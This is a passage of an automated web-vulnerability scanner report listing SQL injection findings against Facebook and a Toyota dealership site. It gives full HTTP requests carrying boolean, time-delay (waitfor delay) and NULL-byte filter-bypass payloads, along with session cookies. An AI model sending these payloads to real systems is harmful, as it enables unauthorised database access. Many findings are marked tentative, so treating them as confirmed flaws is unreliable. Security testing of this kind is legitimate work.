Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:46:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:46:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=HCGRGUJOILIQMCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 74247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In more than two hours of legal sparring, lawyers on both sides of the battle over the state&#27;s ban on same-sex marriage were at various times pressed by each of the three 9th U.S. Circuit of Appeals judges hearing the challenge to Proposition 8.'><meta name="keywords" content="samesex marriage gay supreme court alameda contra costa county clerk"/><title>Appeals Court judges appear inclined to support gay marriage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatimes.com";
   MNGiIDCookieName = "MNGID";
</script><script language="JavaScript" type="text/javascrip
...[SNIP]...

1.146. http://www.facebook.com/logout.php [campaign_click_url cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /logout.php

Issue detail

The campaign_click_url cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the campaign_click_url cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /logout.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=1285988221-da9465b31b1cec814c13f1f6b4ae65cdbc0d9239959dc268afeca; wd=450x40; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews1reports.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews1reports.com%252Fdefault-js.asp%253Fview%253D0%2526funnelid%253DF180%2526a%253Db%2526siteid%253DAPS%2526vid%253Dctt_id%253D%2526ctt_adnw%253D%2526ctt_ch%253D%2526ctt_entity%253D%2526ctt_cli%253D%2526ctt_kw%253D%2526ctt_adid%253D%2526ctt_nwtype%253D%26extra_2%3DUS'%20and%201%3d1--%20;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=e0q9u; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 08 Dec 2010 01:55:25 GMT
Content-Length: 14018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zn/r/AzojFY93_oG.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zb/r/UCbfq1H_xvH.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z2/r/p6y1y21JrZi.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/zQ/r/IUPuxNuZZDM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/zJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/z7/r/5875srnzL-I.ico" /></head>
<body class="WelcomePage UIPage_LoggedOut ie7 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div id="dialogContainer"></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div ><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 -->
<div class="WelcomePage_Container"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><i class="fb_logo img spritemap_aanaup sx_cd927a" title="Facebook logo"></i></a><div class="rfloat"></div></div></div><div class="WelcomePage_MainSell"><div class="WelcomePage_MainSellCenter clearfix"><div class="WelcomePage_Warnings"><div id="standard_status" class="UIMessageBox status"><h2 class="main_message">Javascript is disabled on your browser. Please enable JavaScript or upgrade to a Javascript-capable browser to use Facebook. Alternativly, you can access the mobile version of Facebook <a href="http://m.facebook.com/">here</a>.</h2><p class="sub_message"></p></div></div><div class="WelcomePage_MainSellLeft"><div class="WelcomePage_MainMessage">Facebook helps you connect and share with the people in your life.</div><div class="WelcomePage_MainMap">&nbsp;</div></div><div class="WelcomePage_MainSellRig
...[SNIP]...

Request 2

GET /logout.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=1285988221-da9465b31b1cec814c13f1f6b4ae65cdbc0d9239959dc268afeca; wd=450x40; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews1reports.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews1reports.com%252Fdefault-js.asp%253Fview%253D0%2526funnelid%253DF180%2526a%253Db%2526siteid%253DAPS%2526vid%253Dctt_id%253D%2526ctt_adnw%253D%2526ctt_ch%253D%2526ctt_entity%253D%2526ctt_cli%253D%2526ctt_kw%253D%2526ctt_adid%253D%2526ctt_nwtype%253D%26extra_2%3DUS'%20and%201%3d2--%20;

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=k47Eg; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 08 Dec 2010 01:55:26 GMT
Content-Length: 14148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zm/r/_0agVp2CPvr.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zb/r/UCbfq1H_xvH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/z9/r/OexS-J-uMsq.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/zn/r/DAW4CKZxmmR.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/zJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/z7/r/5875srnzL-I.ico" /></head>
<body class="WelcomePage UIPage_LoggedOut ie7 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div id="dialogContainer"></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div ><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 -->
<div class="WelcomePage_Container"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><i class="fb_logo img sp_aanaup sx_cd927a" title="Facebook logo"></i></a><div class="rfloat"></div></div></div><div class="WelcomePage_MainSell"><div class="WelcomePage_MainSellCenter clearfix"><div class="WelcomePage_Warnings"><div id="standard_status" class="UIMessageBox status"><h2 class="main_message">Javascript is disabled on your browser. Please enable JavaScript or upgrade to a Javascript-capable browser to use Facebook. Alternativly, you can access the mobile version of Facebook <a href="http://m.facebook.com/">here</a>.</h2><p class="sub_message"></p></div></div><div class="WelcomePage_MainSellLeft"><div class="WelcomePage_MainMessage">Facebook helps you connect and share with the people in your life.</div><div class="WelcomePage_MainMap">&nbsp;</div></div><div class="WelcomePage_MainSellRight"><div cl
...[SNIP]...

1.147. http://www.fremonttoyota.com/AF2/milapi/0.2/mil.php [confid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /AF2/milapi/0.2/mil.php

Issue detail

The confid parameter appears to be vulnerable to SQL injection attacks. The payloads 11313056'%20or%201%3d1--%20 and 11313056'%20or%201%3d2--%20 were each submitted in the confid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /AF2/milapi/0.2/mil.php HTTP/1.1
Host: www.fremonttoyota.com
Proxy-Connection: keep-alive
Referer: http://www.fremonttoyota.com/recall2010.html
Origin: http://www.fremonttoyota.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; BIGipServerAPACHE_DEV=2936078602.20480.0000; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmb=198428792; __utmc=198428792; __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 20

confid=fremonttoyota11313056'%20or%201%3d1--%20

Response 1

HTTP/1.0 500 Internal Server Error
Date: Wed, 08 Dec 2010 00:45:16 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 00:45:17 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: application/xml; charset=utf-8
Content-Length: 0

Request 2

POST /AF2/milapi/0.2/mil.php HTTP/1.1
Host: www.fremonttoyota.com
Proxy-Connection: keep-alive
Referer: http://www.fremonttoyota.com/recall2010.html
Origin: http://www.fremonttoyota.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; BIGipServerAPACHE_DEV=2936078602.20480.0000; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmb=198428792; __utmc=198428792; __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 20

confid=fremonttoyota11313056'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:45:18 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 00:45:19 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Content-Type: application/xml; charset=utf-8
Content-Length: 66

<?xml version="1.0" ?><results><disclaimer></disclaimer></results>

1.148. http://www.fremonttoyota.com/Toyota-Dealer/Fremont/About%20Us/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota-Dealer/Fremont/About%20Us/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:22:17 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:22:19 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:22:18 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 17374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>Toyota Dealer Servin
...[SNIP]...
<br /> Thanks to our delightful location near Fremont, our exceptional Toyota products and services are available to our friendly neighbors all around Alameda County, and furthermore, to commuters throughout Northern California. Here at Fremont Toyota, you will discov
...[SNIP]...

Request 2

GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:22:29 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:22:31 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:22:30 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 17421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>Toyota Dealer Servin
...[SNIP]...

1.149. http://www.fremonttoyota.com/Toyota-Dealer/Fremont/About%20Us/ [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota-Dealer/Fremont/About%20Us/

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1%00'; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:04:16 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:04:17 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:04:17 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 17447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>Toyota Dealer Servin
...[SNIP]...
<br /> Thanks to our delightful location near Fremont, our exceptional Toyota products and services are available to our friendly neighbors all around Alameda County, and furthermore, to commuters throughout Northern California. What you'll find at Fremont Toyota is t
...[SNIP]...

Request 2

GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1%00''; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:04:22 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:04:23 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:04:23 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>Toyota Dealer Servin
...[SNIP]...

1.150. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /Toyota-Dealer/San%20Leandro/About%20Us/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 17557 milliseconds to respond to the request, compared with 1841 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Toyota-Dealer',0,0)waitfor%20delay'0%3a0%3a20'--/San%20Leandro/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 03:05:44 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 47928

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso
...[SNIP]...

1.151. http://www.fremonttoyota.com/Toyota/Corolla/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Corolla/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 54409 milliseconds to respond to the request, compared with 11073 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Toyota',0,0)waitfor%20delay'0%3a0%3a20'--/Corolla/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 03:40:49 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 47942

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso
...[SNIP]...

1.152. http://www.fremonttoyota.com/Toyota/Highlander%20Hybrid/ [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Highlander%20Hybrid/

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Toyota/Highlander%20Hybrid/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00'; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:26:52 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:26:54 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:26:53 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 25507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Highland
...[SNIP]...
ority are abundant in the stylish 2011 Toyota Highlander Hybrid package. The all new Highlander Hybrid is exalted and for good reason; it boasts only the highest quality in features and design without exception. <br />
...[SNIP]...

Request 2

GET /Toyota/Highlander%20Hybrid/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
